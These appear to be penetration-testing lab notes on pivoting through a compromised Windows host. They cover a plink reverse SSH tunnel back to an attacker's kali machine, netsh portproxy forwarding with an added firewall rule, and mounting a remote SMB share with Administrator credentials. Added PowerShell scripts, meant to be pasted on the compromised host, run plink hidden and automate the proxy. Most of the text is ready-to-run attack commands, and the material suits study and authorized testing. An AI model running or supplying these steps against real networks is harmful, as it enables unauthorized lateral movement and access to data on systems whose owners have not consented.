Port forwarding Windows

netstat -anpb TCP

(-b shows the owning executable and needs an elevated prompt)

and see that there's another service listening, but the host firewall (or a bind to 127.0.0.1 only) is stopping us from connecting to it from outside.

you can transfer plink.exe (the Windows command line SSH client from the PuTTY suite) to the target and open a reverse tunnel back to kali:

cmd.exe /c echo y | plink.exe -ssh -l kali -pw pass -R kali_IP:1234:127.0.0.1:3396 kali_IP

(3396 is the port the hidden service listens on; "echo y" auto-accepts the SSH host key, so you are trusting whatever answers on kali_IP; -pw also leaves the password in the process command line, so use a throwaway account or an -i key file)

Note: unless GatewayPorts is set in sshd_config on kali, sshd ignores the kali_IP bind address and puts the listener on loopback, which is why the check below targets 127.0.0.1.

if it works, we can do a quick nmap scan on kali to confirm the service is reachable through the tunnel:

sudo nmap -sS -sV 127.0.0.1 -p 1234
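The same reverse tunnel as an added example (not from the original notes), written so it can be pasted into a PowerShell session on the compromised host: the host key is pinned with -hostkey instead of blindly piped "y", -batch stops plink from ever prompting, and -N opens the tunnel without a remote shell. The IP, credentials, fingerprint and ports are placeholders; get the real fingerprint on kali with ssh-keygen -lf /etc/ssh/ssh_host_ed25519_key.pub over a channel you trust.

```powershell
# Added example, not the original notes' command. All values below are placeholders.
$KaliIp    = "10.11.0.4"
$KaliUser  = "kali"
$KaliPass  = "pass"
$HostKey   = "SHA256:REPLACE_WITH_REAL_FINGERPRINT"   # from ssh-keygen -lf on kali
$LocalPort = 3396   # hidden service on this Windows host
$KaliPort  = 1234   # where it appears on kali (127.0.0.1 unless GatewayPorts is set)

$plinkArgs = @(
    "-ssh", "-batch", "-N",             # -batch: never prompt, -N: tunnel only, no shell
    "-hostkey", $HostKey,               # pin the host key instead of "echo y"
    "-l", $KaliUser, "-pw", $KaliPass,  # -pw is visible in the process list; -i key.ppk is better
    "-R", "127.0.0.1:${KaliPort}:127.0.0.1:${LocalPort}",
    $KaliIp
)

# run detached so the shell that launched it is not tied up
$p = Start-Process -FilePath ".\plink.exe" -ArgumentList $plinkArgs -WindowStyle Hidden -PassThru
Start-Sleep -Seconds 3

if ($p.HasExited) {
    # typical causes: wrong password, fingerprint mismatch, sshd not reachable
    Write-Warning "plink exited with code $($p.ExitCode): check credentials and host key"
} else {
    Write-Host "tunnel up (pid $($p.Id)); on kali run: sudo nmap -sS -sV 127.0.0.1 -p $KaliPort"
}
```

Kill the plink process (Stop-Process -Id $p.Id) when the pivot is no longer needed; the tunnel otherwise stays up for as long as the session lives.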

----

Using a SYSTEM (or any administrator) shell to pivot through with NETSH

- netsh is installed on most Windows versions

  • portproxy needs the IP Helper service (iphlpsvc) running and IPv6 support enabled (can be confirmed in Services and the network interface settings)

netsh interface portproxy add v4tov4 listenport=4455 listenaddress=current_IP connectport=445 connectaddress=other_network_IP

add a firewall rule so inbound connections to 4455 are allowed:

netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=current_IP localport=4455 action=allow
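The netsh steps above as one added example (not from the original notes) for an elevated PowerShell on the compromised host: it starts the IP Helper service if needed, adds the proxy and the firewall rule, checks that the listener exists and that a connection actually passes through to the far side, and tears everything down again. Both the portproxy entry and the firewall rule persist across reboots (portproxy lives under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy), so the cleanup matters. The IPs and the rule name are placeholders.

```powershell
# Added example, not the original notes' commands. Placeholder values:
$ListenIp   = "10.11.0.22"       # this host's IP on the attacker-reachable network
$ListenPort = 4455
$TargetIp   = "192.168.1.110"    # host on the other network (placeholder)
$TargetPort = 445
$RuleName   = "forward_port_rule"

function Enable-Pivot {
    # portproxy silently does nothing if IP Helper is stopped
    if ((Get-Service iphlpsvc).Status -ne 'Running') { Start-Service iphlpsvc }
    netsh interface portproxy add v4tov4 "listenport=$ListenPort" "listenaddress=$ListenIp" `
        "connectport=$TargetPort" "connectaddress=$TargetIp"
    netsh advfirewall firewall add rule "name=$RuleName" protocol=TCP dir=in `
        "localip=$ListenIp" "localport=$ListenPort" action=allow
}

function Test-Pivot {
    # 1. a local listener on the proxy port must exist
    $listening = Get-NetTCPConnection -LocalPort $ListenPort -State Listen -ErrorAction SilentlyContinue
    # 2. print the persistent proxy table for the record
    netsh interface portproxy show all
    # 3. end-to-end: a TCP connect through the proxy must reach the far side
    $ok = Test-NetConnection -ComputerName $ListenIp -Port $ListenPort -InformationLevel Quiet
    return (($null -ne $listening) -and $ok)
}

function Disable-Pivot {
    # both entries survive reboots; remove them when the engagement step is done
    netsh interface portproxy delete v4tov4 "listenport=$ListenPort" "listenaddress=$ListenIp"
    netsh advfirewall firewall delete rule "name=$RuleName"
}

Enable-Pivot
if (Test-Pivot) {
    "pivot ready; on kali: smbclient -L $ListenIp --port=$ListenPort --user=Administrator"
} else {
    "pivot not reachable: check iphlpsvc, IPv6 support and the firewall rule"
    Disable-Pivot
}
```

Test-NetConnection only proves that a TCP handshake completes through the proxy; whether SMB on the far side accepts the credentials is checked with smbclient from kali as in the next step.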

on kali, stop or restart the local smb service first so it does not interfere with the mount (the note says stop; the command below restarts it):

sudo /etc/init.d/smbd restart

then list the shares through the pivot (the compromised host's IP and the 4455 listener, not the final target):

smbclient -L compromised_IP --port=4455 --user=Administrator

then try to mount the file share (10.11.0.22 is the compromised host exposing port 4455; the password is quoted so the shell does not touch the "!"):

sudo mkdir /mnt/win10_share
sudo mount -t cifs -o 'port=4455,username=Administrator,password=Qwerty09!' //10.11.0.22/Data /mnt/win10_share
ls -l /mnt/win10_share/
cat /mnt/win10_share/data.txt
